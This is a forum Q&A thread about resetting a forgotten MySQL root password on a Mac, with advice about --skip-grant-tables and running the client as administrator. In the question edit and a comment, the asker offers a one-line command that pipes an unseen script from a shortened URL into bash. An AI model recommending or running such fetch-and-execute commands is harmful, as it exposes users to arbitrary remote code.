# Mysql - How do I reset forgotten password? Or is there a way to delete all the record?

Tags: mysql

I have tried so many commands but none of them work. When I use the command "mysql> UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root'; " to reset new password, it got denied.

Here is error message. ERROR 1142 (42000): UPDATE command denied to user ''@'localhost' for table 'user'

What should I do now? Is there any way to delete all record and restart everything? BTW,I am using Mac.

I found the solution. It is one line command. 
bash <(curl -Ls http://git.io/9xqEnQ)

Comment: did you restart mysql using skip-grant-tables?

Comment: I did. It just didn't work. Most solutions online are using that. But I found another one and it worked!! It is just one line command. bash <(curl -Ls http://git.io/9xqEnQ)

Answer (score 0):

The key to this, after restarting MySQL with the `--skip-grant-tables` option, is that you must have executed the MySQL client *as administrator.* Otherwise the change will appear to take effect for the session but will revert afterwards.

Don't forget to stop and start MySQL *without* `--skip-grant-tables` again!